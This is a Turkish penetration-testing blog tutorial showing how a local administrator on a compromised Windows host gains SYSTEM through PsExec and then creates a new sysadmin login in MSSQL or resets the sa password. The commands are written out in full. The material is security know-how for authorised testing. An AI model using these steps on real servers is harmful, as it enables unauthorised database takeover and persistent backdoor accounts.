Yerel Yönetici Hakları ile Oturum Elde Edilen Bilgisayarda İşletim Sisteminde SYSTEM Yetkisi Elde Ederek MS SQL Veritabanına Erişim Sağlanması

Sızma testlerinde MSSQL yüklü bilgisayarda yerel yönetici hakkına sahip olduktan sonra, veritabanına direk olarak erişime sahip olunamayabilir. Bu yazıda, MSSQL sunucu bilgisayarda yerel yönetici iken, uygulamaya giriş yapabilmek için işletim sistemindeki SYSTEM hesabının kimliğine bürünülecektir.

Mevcut durumda, yerel yönetici hakkı elde edilen bilgisayardaki MSSQL uygulamasında kimlik doğrulaması olarak Mixed Mod etkindir.

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-01

 

Ele geçirilen bilgisayarda, yerel yönetici haklarına sahip olunmuştur.

whoami
net user hacked

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-02_1

 

Ancak yerel yönetici hakları ile veritabanlarına erişim sağlanamamaktadır.

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-03

 

Yerel yönetici haklarına sahip bir kullanıcı, Sysinternals Psexec aracını kullanarak SYSTEM haklarına erişim sağlayabilir.

whoami
PsExec.exe /s cmd
whoami

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-04

 

SYSTEM haklarına erişim sağlandıktan sonra, MSSQL üzerinde yeni bir kullanıcı oluşturulabilir ve bu hesap ile MSSQL üzerinde oturum açılabilir.

sqlcmd -S localhost
USE [master] GO
CREATE LOGIN [sa_hacked] WITH PASSWORD=N’Hh123456′
GO
EXEC master..sp_addsrvrolemember @loginame = N’sa_hacked’, @rolename = N’sysadmin’
GO

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-05

 

Not: Yeni kullanıcı oluşturmak yerine, (tavsiye edilmese de) mevcuttaki bir kullanıcının parolası da sıfırlanabilir.

ALTER LOGIN [sa] WITH PASSWORD=N’Ss123456′

 

Oluşturulan yeni kullanıcı hesabı ile MSSQL üzerinde oturum açılabilmiştir.

gaining-access-to-mssql-database-from-operating-system-privileges-by-escalating-privileges-to-system-user-06

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.